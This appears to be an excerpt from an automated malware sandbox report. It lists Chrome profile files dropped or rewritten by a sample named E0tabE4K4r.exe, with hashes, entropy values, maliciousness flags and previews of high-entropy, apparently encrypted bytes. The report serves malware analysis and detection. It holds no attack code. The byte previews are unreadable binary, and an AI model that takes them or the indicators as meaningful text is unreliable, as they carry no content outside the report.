                                                                                                                                                  SHA-512:FBE434863023E865BA4B22F3C969AE43D9DC02275797CB7A49F7B8FCE21DAD3987F8047218356320E514DE5E2E08BC3DA211588F0E9FD93BBF31C96F3433BAB4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG..a..-OW....@...u......G.5...>d%4..P{.LE?.A.......Q/.3{2s....z......A.Z.56.I.....3.v3p.Q......8J.V2.7.S.+.....5;;.>.B....2.......7.VU4...S.v+-...j.....] D.).v.A.N....w.}.eM.W+..=...s.....u.1..{....I.(..j.c....d...../u...e1).._<.....T....~.n.HR..?.M.XwB...>\......n[.8.B..~Ygn.[..^..z+...>Kf.,.j\.....}..2.1.....C.....&..>.6..`8. .....y....\...HoA0x..h.w..C..!..mu.}.F......cn._e.......B.o..Y.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_maximize.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):500
                                                                                                                                                  Entropy (8bit):7.512231331017911
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:+eEgzvLowx9u6rFk8XJYU6+r3b9KPafVtGxPtVFSUdNcii9a:+88G9usF3l3VfKPQ2bD
                                                                                                                                                  MD5:3297A0D852B3264A1522AEF0EE7F90C9
                                                                                                                                                  SHA1:D76D735214A8CB971995C4987523956CD7617C0B
                                                                                                                                                  SHA-256:C2DFEF86D473861D3DBADE15DD877D339D7AEA2536A59AA00D9747ABC5DE8428
                                                                                                                                                  SHA-512:F45BCF9CEDC08C38F7BBB7E8C85C42635E8B9C12BFB80BDA5FC7242963D92E4CDE6161E39D99DEDEC19DD93D79710C9A0429FDD0AE473D77BA0FE9D13CBF267A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG.Sq.pR..e.x.B..L.l...<S:..z..*..J+b.....'G\.Y.....w.U.U.Kq.D.$..C.;...jsd.dI.F.f..t.^.;}..9.=.`..u....2..c.ey.;(3.P..Z..r.?..u.G..tS.M..gYX.rb.S.....+..&.. !`?.."q[`~k..!..\2.*..\>p....Jw.l...y....0. X..STN.x...k...;...0.j|...D..P@.~8D...+.J.p....T.............)b...O.....~.S..Tq.0s.d.bs......kn......^..Y..WZ..7....%4..W $p\..e...S....L..^.)qi......(sm\Y....K.BT..r.*gx.Y.d....T....b.`"S.....8.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_pressed.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):494
                                                                                                                                                  Entropy (8bit):7.494627785554312
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:nTZbk0zrUWmGEZKvV5SfyZLHLzDm9pl34EQoSZzoVSUdNcii9a:nlbjHYG/vV5eoHS9L3aoSZz72bD
                                                                                                                                                  MD5:9C34A1F917BD1456FFE1D04A2C5192A6
                                                                                                                                                  SHA1:1FF789241192ABDBDD7095FF296E3CE6763924D9
                                                                                                                                                  SHA-256:AC3A43B1F14BBF00690BA60E5BD43BF8C488E79D9489B572BCD181AD7E7CAF12
                                                                                                                                                  SHA-512:3484F8334EA237783608EAB16B73A0BA915ABB972D247126CFEE7346E883791ECDCA84E36D6C91D9BA98060E4BB044E940BC09092F2C7AD2076E257C15C62026
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG.<......K".S...3'q..o.U....{.n.k..'j.2..........Xcb2R...;...........^U.r.u.x.J..&..:..HU.5D1...m.*..{r.. ...g.4.P.....e....."...].."...f...8j...r(=...M.R.E..7p..9........A.....0.~._...w.kV5...0..Q5.......i.v...`@.....p......9....P..RA.\..<.y..#; ....Q.~zD.z..`s....l....M.....D.T.\.$...x..;d.6.........o.\.n..CM.1....}..........Pr.4Y.'9.cvd.G..&.....v;.u...}..7..$...Rx........D...U.5.X.,.~...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\manifest.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1656
                                                                                                                                                  Entropy (8bit):7.868438219563508
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:56SX6xGEXWYmyr2hWCvun9Mupg066n6+wFprYD:56SXAX1jr2hWCv4P4661Fu
                                                                                                                                                  MD5:53939532E13AAA6CE405A7E0004299C4
                                                                                                                                                  SHA1:A07E4BA8CA4BA64CB9401CA836C84714C6D61DF6
                                                                                                                                                  SHA-256:50952FD0542F541F1A67B3E4662FF03A3BD240F91FCE1B58C88E6344933E79CE
                                                                                                                                                  SHA-512:81B653615A044E29454C1B7EB8DB0B228E5E1B7C75D5A897EFFCB0E33A2E7EC98A4514D99830D73B2C6928DC6318CEFA691EC9EE45E870912BFC1AE5E00054DA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.. .rCl.b....m(.T..u0Q].g?-.r.0...j...|..d7X.r...a...N..i.0.h.bE..U..........R>|...x...IN....N......C.....}....?.0......S\....1k.h..>q..LK.C0C....Q.K....3D...Z]}n...N.t.[q;....s....l....q.`......`..'..X....gn...../mw{|@U.+$..L}..}.U.|..F+.....bKr:<.@...T6CQJ..!.o^.Gf..G..eV)a.Vb......]B......Y..;.GG...7V..Pv..).....#.F..J)R.O.V..OF..m(.Z..........'...)J1{F]2....$.t...Su./..1....X+|Ru)~'.sz.......QxaS..a....k.4..WWi.w.V%...mh^R...A.. J.y..c..Br2UJo~M..L...)...6..}7r.D....\FP.:..h_....#.^.....n#Q)...........r..^.J.6....F..Q..F..................ip;.....F..y..u..3..q:$....w.^.Xmf.(..u..i...l...A......?W..R}....>.....N.......V..-..tM@...........u.nm...*'w.NuGr+..(.Q.{i.5.Ug=~t...DQ.\z........;.3E.8.H\....v...Q..#......q..I....=.VEo.C.....>.{.:39>.#Q\.1..q=NN........RB...r.g.w`{~............>.S.3.....?..4\...........Vl....y....\. 6ba^.Q..o.5...pL/~'xg..c...jo...b.w.J....f'.....Z.h...#...'... ..0.Wb<...a.<d.#7.o..}.. mam,.b..T...|..S<{t

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):666
                                                                                                                                                  Entropy (8bit):7.676346660455597
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:kiQgcjjcsC+XuyneAlkMNlbH0UovIg7/Gh+mNeHopL7T7SUdNcii9a:DQP3c0u9AGMlip/KZqKK2bD
                                                                                                                                                  MD5:C04822F615954921B3B4E8912BF21695
                                                                                                                                                  SHA1:AB4811CC558E2F4ED429E53BDEC75D06FAC39B90
                                                                                                                                                  SHA-256:EF32B4A983E4A2B236761F71056FE3B4B8F4ACAB71DEE0BDD356711A2D2A8F53
                                                                                                                                                  SHA-512:02FF77E846ECD3C2143A291465E315638224B17591322511B01E2A1AC606906D743A22F176C2EBE5CE49436EBFABEE48791BF0A29B1568E5EC115CE4875AE653
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:2023/..IL_B.H+.....L..R.qgO......\..o.... ..:..k.KHw.........S...L.l..k.a/=%..f.F. ..n..:.PA!.`1.......I..#9-.i.$.M!..z...%..xE....k.6....B:...*.....D..q.hm..'.7s.C#"."..^\]i....QTN...:.#d....Rm.,M.\..kFW=` .E......U.O[..o...[... .sX....d=....z.W.9.bG..M?Ii.z.WR.H........_o....w....J%9^g.g._8.....N.p.....<..d...CQ..h5.A.._.<.A.F..F.....]8c...=5..r.....Aye..x.u..G......(.P}..T$FJ...&.]YN&...im......,@...eWyU1.|.Jp.:r..^.qGR...V@.e..../^..;....)..l.^..'4%....u..#a/}..5.=Q.#s..M.u..*..!.W.......sq..1.K._A.._./p.-M..%..Z..O^J%..>..c...........IT.:....6T..t..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):547
                                                                                                                                                  Entropy (8bit):7.600098883410412
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:SIf309UwaUOqriHCumz7UECdzV23o3UMnDS45MYbaJFsRYFSUdNcii9a:XcUwpTiYzABzV0M+DYaFAYo2bD
                                                                                                                                                  MD5:48B0A1C2FC190D047170258A3AA87B92
                                                                                                                                                  SHA1:CC52B6D5EEA179874B1E87F4696AF0DEA0CD3C59
                                                                                                                                                  SHA-256:BE40FDF05982564DFC81275631E6196FDBB5B070EBAE8DBC8A837FD55AA5FE6E
                                                                                                                                                  SHA-512:19284605D38FFE1BA47B3687A8054251514359C3999ABDC4C3D6C63EBC5BDC67C50F571D3E02B6A7F40E35B45B4E76C916FFF6838597AB491A69ABB3247D570C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:*...#...a.J..?..~..N...{......wr...f"..~;....d........GY.b.G..*...x.]{..}.g...-K..$.e.-..-^v.r.-X.Q.=.....k`.._...3.`..].z.R.v..z.wz:.o...#I.]rb......a...4..if.w..9.w..eIc.:[..Y....YC.u.....a.J....&a^.....m...[8Smh......3d...d...8S.=....._-&g3.....C...NF..u-G...r............*!y..N:..~`.g.E..w..hz@Iz^.._.o.4.7.........V..E.....OzU..p...M....W7.....p........E....(..\.+.C../&.V..}.'..+.....d.O.... ..p.K.Gi.........../j.ys...T...yH........0........l...K:mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.old

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):654
                                                                                                                                                  Entropy (8bit):7.688236961504511
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:kJVsbLl8tg0xBo4o2vWmMEBMKBDJ5laIRDENG374rnMaUqO6NpIBP9GmHJGv/SUn:sKbLutO4ROmMcMaFdwNG374rnMlv4kPK
                                                                                                                                                  MD5:6744AD47DF88C48A9778753CDAAD5FA4
                                                                                                                                                  SHA1:730BA82C699A7099A0E234E4577BB04CB0D3270B
                                                                                                                                                  SHA-256:92A418872DBFC9250A9EAAB5BB77FE7BB3C178D42D3E2832B4F27ACD4B87F5DA
                                                                                                                                                  SHA-512:EB05F1E65658B00B06E1236C02F33693DE930EC63BBF67CE84419B98E95A7DBC9737080A07295B2DC31167A1BCAA1E41C06DABDB0A22B58901DEA2BCB3D849F3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:2023/...U..B.* ....l.*...a...S..........1*w...:.Hu..:j5Lhls......."...o}Z@~..H.4.*..../=..;I........S..._.D..-.7tzO.]..>b+$...j....>........z.....r..8S..k.5..._.6..(.&.fT........B9mD.......Hg...K.r...^;.?.......r......$.d.X!.)d .t.......0..O.....z.O..T.Q~....<.x*.xZ2O.B.p...6g.7...........o..u.A9fK.../*.1..T`.{9B.J...?..v*Y..o.XS...{l.@=qMU'].(Y.{.l..O...Q.W...De....eta..D...X..%._..p.KF./.V.{.....L.Y5..Tn./.?..Z.=...Y..2|.:.}...X....7.......j..A.E.*..T.....+.kY..mR.AYi..!h.(K......N...e#........).>.i..-~.........1..@B#....hq.o..3.?.qO.!.,.0.I!mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):374
                                                                                                                                                  Entropy (8bit):7.371180231522905
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:5dNx+AZZcgaWgV4/B4RP5EN256hjM947SnjgPc8RQDxs9ejNV7nIS1WdNcii96Z:5J/ZZm4GXC2Qhj/HhMxXESUdNcii9a
                                                                                                                                                  MD5:A197C38D4711D69D92E56954ED4ACA77
                                                                                                                                                  SHA1:67ACF17C5DD473E3A66507C879D0484F961DB841
                                                                                                                                                  SHA-256:61D95C1491950425C1E145BC149289DB6AE2D23D24AE8166EA9ED2F1170D2CCA
                                                                                                                                                  SHA-512:DC873D52FA04753F151832EDAAC62E466F86CECF338051FEF9524BFB7B65470A94A7C63FA12326AE87E30BC1F4B25AD6C517CDA40D19FCC032A5745C7DFBDC48
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.On.!q&Dp..7...c....'..#..x.....1..u...}...Z..w@..S.$O%>S..;j?...;....u........'1..UJ......9.."!..8v{_...V.....;.;..Ej~...&...!(...C....).N.0/...P.....[MS.....P}....-W..-...v4./Mt.q.iQ^.P..T.u..:.N#.]...Z..7B..E|>'Ex.K.........?..=6.fhZd.)..YX.B@....B..Z9q..,.Z|qR...f..}...e{`..J...F.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.old

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):679
                                                                                                                                                  Entropy (8bit):7.653884423260957
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:kWMCHVqJjbVBFya4JnT6h0Xa43tjnWtCHIU7Oi60M85unfJ8IsnSUdNcii9a:ZM00Jjbb4Jm0Rt6C3yi60Mn72bD
                                                                                                                                                  MD5:7284C7AC475D4FED90F26E20F0D2B83E
                                                                                                                                                  SHA1:3022B6CE1D11B813EC7A5DA24A32C141FA08A2E8
                                                                                                                                                  SHA-256:E10F4F9D4CB4017DD8F8CEBBC72DA3B9BC05599981BE92D2212E0475F3ED733C
                                                                                                                                                  SHA-512:7B983DE5E295214B6CE7D5D9AE49E9CCAAB0383BC9E096486953E53B3E79B3EB1600E5C74E239AE518AFD929167BD5552D936BD243802C419E9A491C0F16556F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:2023/p...i.C.O.RG(N....C.h..I....=.U.!(.Hb,=.r...;.L$...a.Q........g....k.T.+.l..B...../|]....>..:.e..b..M..}...X.L).p,.......-...>.}..k...=0.X...L.)?........].@P..P..........0...+...I...l...s`oY..XWB;m. E.~...84...o..~+.....DI..J..$..[O6:..q....?.Xu.G.|.{......DW.$....U5....%..`G.>K.k*.PLr.........!....2...&...F~.92.[.."..Q..5...6Qz....m.0...#.O...OzV.H*..Le.D......7th.....B;..1T...............?...6I.._.H.:Os.9]....t..|*;t....[..J........n..2..N.......7,k.8..5@q>y...q. ...k6t...l75....6.=FU...=Ly$.h....1..#x.....v...q.R.....L...........}.....V=..;7...P*LZF.g%u.mo.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2760
                                                                                                                                                  Entropy (8bit):7.938395773025003
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:F5x4Kw3tGUZ95F+smg96bwqFsz0LXnLujyjXhsftYizEggg/4TEpQSD:F5exdr5F+smg9qwzW3thstrU7TK
                                                                                                                                                  MD5:8E245B2D394CEF738D086FBFDC38F318
                                                                                                                                                  SHA1:E57A4E5883ECC5F3F81FA503FBAEEA83D13D6A6D
                                                                                                                                                  SHA-256:AFF0F8F26D170CE2F5DB1D822131AB61BD7A99F68CFCE8CA0BFCAB127EBA5B97
                                                                                                                                                  SHA-512:25494C18068501A96184EAC983BCE3C6EF0782D16F4DCFB8602A5B438FE500C5971E5CCF32B175CAA5B8973A5DA7C2A6BF16AD768B3172AF41F751FFE3C46B37
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:...n'dtU..UW.e.Q.C.......o.!d.k........t...*..g............%.Fk]..&V.+.....Y..6zoY^.]..o.7.H..V@....%...M...I.}.yutHWNP"]drh..&.`Xi..\..@..p..:...8...+.].TC.j.*.}~..h)U,P.49.].B.".........# ,.?.*lO.^..|.."..........s...lg4...!..m..q..2b...jf/..up.....5.G..Mdf}H..}[`..'...he...G..1...2|..'....LikD.....2.R..pV.D.N...71j.;:...\#.n.2{.t...<E......r...?7.Z.=..U..J....05_).ye..-v.U....S...k@DM.....|3/....L>...s%..W].....<*...9..ADP.{*.s......}..((..h.j..\y...7N.kz.wV5..S2.....y.N.?..TH..Z..*.]~.T..g.#.U|Z...V........d .ch..n1...Vx...%.$...b.....O}Ax....~K...\..1...e\...?.....?Q..,r.7..8...;..-..`h...n.....W&..J..I.%.1#1.P}.)..A[N..B.J.D..@).WD..!....(..8.4V(rtRq[......b.....,..lOX.b..bjx.M..X.?.}..H..'.m,..@...kx.'>.u.m|.@*@IwV[t.6......1.pQ...6L#./ .~....@.M;...;...c.+.#.....l.L.I..5Q8..(.a5=h....P...<..Z.}...,.lQl....K'.C00...2D..7.[...)i..lX3....._.A.+K.........*R..^.25..9.'#...<.T..bZ.....A@n..h.....>A..e.;...b.l.c..D....M.J;....V.X<F

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):655
                                                                                                                                                  Entropy (8bit):7.671714526391131
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:k6oZUlXbkw2tce/XrwVHgYgvyU5TRa4ey0B5hpi3vfU/P/SUdNcii9a:YuKHtci7wSRRa4ey0B5TUvc3a2bD
                                                                                                                                                  MD5:E0AE98B84573F24CB70E6BB457C25485
                                                                                                                                                  SHA1:CEABE10BCDEF44838D8DCCD93D4D732A5AFB7510
                                                                                                                                                  SHA-256:16B0D56631BEE9CF801C73100CF3E2D63DEA1D5D750B246233B39F977C953173
                                                                                                                                                  SHA-512:93CA29322880661D24F1E442F5F47CA4AB05BBCF36E80F69F41CDEDAC8B0657F4A15165B0C0ECA69886B7CFCBA7174DB3E588CA3BF44AD6AEB5E0987FE58D78F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:2023/.a....Do2.Y...W.K^z..*. .Uq.S......H,..3...vB4...-)p=).....D.......1.^5.%.....g.c.......&.jV.m.?..a.!...Am.hq ..wF)...4...B.?.|t..y.]......Z.K..~..qc?........... {..V.....p..R$...p.....^2.."#...~R..o..S..,.rnRD......4>..|'.6....{.[T..TgevNN.U'.2p.s.I...o.......H!.>.......rG....2|S....N..K".xw.$z+.....1g.!..B.).d.BU.,.do..$.....%...MqQ.@#.y)7m..$.&....(.9...D%..r.*l!....E..S...8.9..&v..[..$...S,r....>..P..._..f,HC^.a..=1{g.M.#]O......RV{.IY...2..U..>.......z/...e.{....HEC..i....`..~. ..k.wK7lj...S....}[......{....b..qc.:q.C.n-...~..../....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\128.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8296
                                                                                                                                                  Entropy (8bit):7.9742746068483
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:q+uGCM+ARQ9OLo/QyUxhRQcg6owXTajefVs6CJpRlDBg:qoCMIO0YyUxhRm9B2VsRJRy
                                                                                                                                                  MD5:B9C3EB3D2297BAFDA8AE96CE5974E9F5
                                                                                                                                                  SHA1:E3ED918B2E14D428FA46E926FA4ABF26091B746F
                                                                                                                                                  SHA-256:EAC79DA96A785806D7C98C9501CCDD4836E8F947E0ABDDA46DBC8D580D168B84
                                                                                                                                                  SHA-512:F2B4167D6C84FF00F69DA62A20351F6E54FDC5266EC56838094B11D88252D5D1795D456498385181B645A901A0FAAC935D8D38037596E729DF6F8B9670D251EC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG.E9.=.BsC.Z.nu....J{.B.-....(.'..b.}.=..M..L...K....e....e...:..d...6...1..4.....Ay.],..e.17...%.{.j.#.....x.W..>0.?WW.=`Z/B.....Ws...._+8B...r...f......g[=?.....;.Y2......u2...8..ynz.3......Mv.Y..M.%?..V.?`../l...{b.b@.U..^q.S.....W.E5Xq.N.55\..u.u.q:....T4z.iT.....V.......C..2..H.B...W.o).&.W'...i..cg.}+........O..xiA:.H.p.T6.....u...Gn.M_..R_.?.......2.D...=.X..y....../Y7........3....Ok{.cQ<..1...};...o.7..VmlaM...8.....@..5...G.~....#.....#.%.P.FBf....x'.n$...4.........8..|..bD..z...:.gJ.......x....23...2.; .{.c.6U.fJB.D._4.T.=....O.F...q.........(.H..|.*....g.=..F*R.h|..`q......F..]4...........:.J9.O.......,@~...V.a....BW.J...mmB].:..r..FY..........1E.c.M4Y.y..^.....\..lo`>.M-.|.p=.[q.z3nx..@..P2...~.+..i.X,;.S....^_".k....=Jb..n..~...O..&.H...xo._.-A......N..X=....FT.W.*E.n..i..;......8R.v...+..^r.....>.tI..l... ......x.f..}..^.'.......=..!xmP.z.YeAv....I..g.Mcv..Z.TB..#.a............t..r...G...3Dr....?=..O3.iP"...T..x....v3E.'.i

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\192.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6023
                                                                                                                                                  Entropy (8bit):7.974251238385415
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:0P22aiM6RB8VxT8q5eN7ckUKC/p2LDCfLiyfFF7SY5Eb8oRG6bYiJBtyYTNq:q2cB6oMmokUICF7Bu0lato
                                                                                                                                                  MD5:678787419AB075761B5846941C4EF5FF
                                                                                                                                                  SHA1:E14EA70BCCF9606DD554E4F5D7FA0C6D395D5A8F
                                                                                                                                                  SHA-256:878EEBF72790ACA61A0A8E3B9A96DCA68CE831D35B7351181573C69B0A09D6D9
                                                                                                                                                  SHA-512:D50B192D9B8BA8774EE6A8E588F119326DD19992C422815015759DBA8D3BE0CB6FBCCFC716A9BA4E2EC5D946CD5CB587FB2A121E740711FAA973A3AB9B3503D2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG.r~.<43H.d.O.."..x.Lm..rp1..q(..A....fE....-|8..T...)..@&@.$....GC.s.G$.Ht..n.%q*x.M.....T...n.o..[.} .kt{wws.....Y....S../.".-...@..'.c....w..4..@...op.!#..ka..E..A.T.y.. zr.mQ.k.....r\!..`..i.J.?..P.]...]..?...M.|.kG2w...>Q.E-.j.Q.zy)yM.i....9..W...7.we..r..#~3.S...b.......5.e.v~.4>3.kE.3..i....z...R|...5OS ...0...s,.C...$......S..v.v,.y...B.W.....L.....D.:......o.........X.J.]...`(..0.^........\q.......INM..B...)1..?......^.Ja.T......J...&..Y..E....nm(....(.Q..{.(8..42...eU.....'....{.'Wt...<....Dh.$..[.j.ME.d....N;.*.....T.....d.Z&z..R.oq=.<.....wc.....y....*!..(t2.W.(.z...5.z....%9DC........t.E0..f..>.......h.....).;.k..S9...*\..1_..A\...d.....N5..>..."...i..n..i.O.....].*..}.$d(........._....*/.../Ty....MC.jnc.x.<U....q.[....].`.g..#....$..[.E........s..j%p.... (.3...zt.Cm).i.6...J..u.!.w.KSOE...y.#.....RN../_...,.....j...M..&.O.......s.B.R...#.6.0...)..~...p.]./.H.yQ.]..-4F]'cq...@B...........nk...7.b..^w=.!..........P.

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):19928
                                                                                                                                                  Entropy (8bit):7.990271500076162
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:384:3rBc1YU1Z8Y6WrbMH2VdM/q4I1f7B9e0qJ5I70gHkXDkL:lcx1Zf8SQO7B9ejbI7YTC
                                                                                                                                                  MD5:B565750C2F587080E2ED85AB54794F23
                                                                                                                                                  SHA1:8624C7F1C1DA6AE3F3EE795B7D6CC8506D92BE39
                                                                                                                                                  SHA-256:29D0F3C4D856BB919036146D469D6FB0B6BDEC58DC6DBDF252A9C1B5C9145B0B
                                                                                                                                                  SHA-512:82E1183AF80ED286F3A1D521914F19B14CAB3FF1FED82EBE014FB158B8819A21DF09A5761E6BB1F27A673E3689D995BBCEEEA3F35A1693895920652DBD2638DC
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:.PNG....P.l.$o..@.F.U3.&.h80.lo2X.........=k...9W..u...7z&.>R..U...X...........of...J.....Y!.HB)...FiHa-.,[.C.....k.7x ....r..S.+...}.]8..&...y..%=....\.n.63.....-O.a.......+r.uK..T....n...u.....(...P......W....^...!q2./F...^..w._..k.Ev.p3l.Wb Sv2.*.....u..7%.I.=....?.Y..a....d`B... ..x.....'.\..~#.=D.r.L.3.w.r.B..N..=...ypw.......d.6.I......V.,B..;d..k.......j.......>..y.......<k*....P]."6*..L...*...?+}+.....D..U..*.`..U.G.L'x.`.Qpc..Fi.d0.....c..fKi..+..q}......3BXD..\&...L7...]?J.3.F.....nz....=s.j.Q..{h.........<....&:.%..f&....kf-........x.Zg.6...9.>"h._...C9.%..]b.5........j...;6.....Z}.....R.5......p....9.b..8......9K?.7........d.A/V...0?0.e'8.q.n..|......._~>.]{......5G..&a.is+M...p......'P..Wy..UFS...%..+..vF.ib.X.r...`...P....NV.....`7*.^.8#...m.|.YjtX.<w'.-...[..!.e.....w|m..=..;4gQ.-7f]..qC.w.). ...{..~@N.h....n.L.#.j.L....."5;J....l..t'X..~...1....y..P.,..F..[.7..x...;..,3.P.....MW.7..!..w.:q.~!....tH.d./.q....G.....

                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2150
                                                                                                                                                  Entropy (8bit):7.910824250592023
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:SKjv/1tMZVQ2BT2W3VbAnGHAjh2vevYSal+gWpBkIeYrm3PTFfGIOGh0PfkD:J31KVQ2BT2ChH82vewSal6pBk5B3PT1x
                                                                                                                                                  MD5:AB44713981182E823C793D99CC588215
                                                                                                                                                  SHA1:FC088373778F733667AF709277D33A8772E5D379
                                                                                                                                                  SHA-256:8CCB7A9DA0449A7C7CDC78ADD29493714C300137984E774BD28F326EB9FB1BD7
                                                                                                                                                  SHA-512:506FAD5D6A16BED24BAD56C80D35AD69B0A7D69025BEA65F582807D82FB2C00E65A364776318BC6506C6386CCF5FC56C378B58BB2389CE4CB438B4D2191D56A5
                                                                                                                                                  Malicious:false
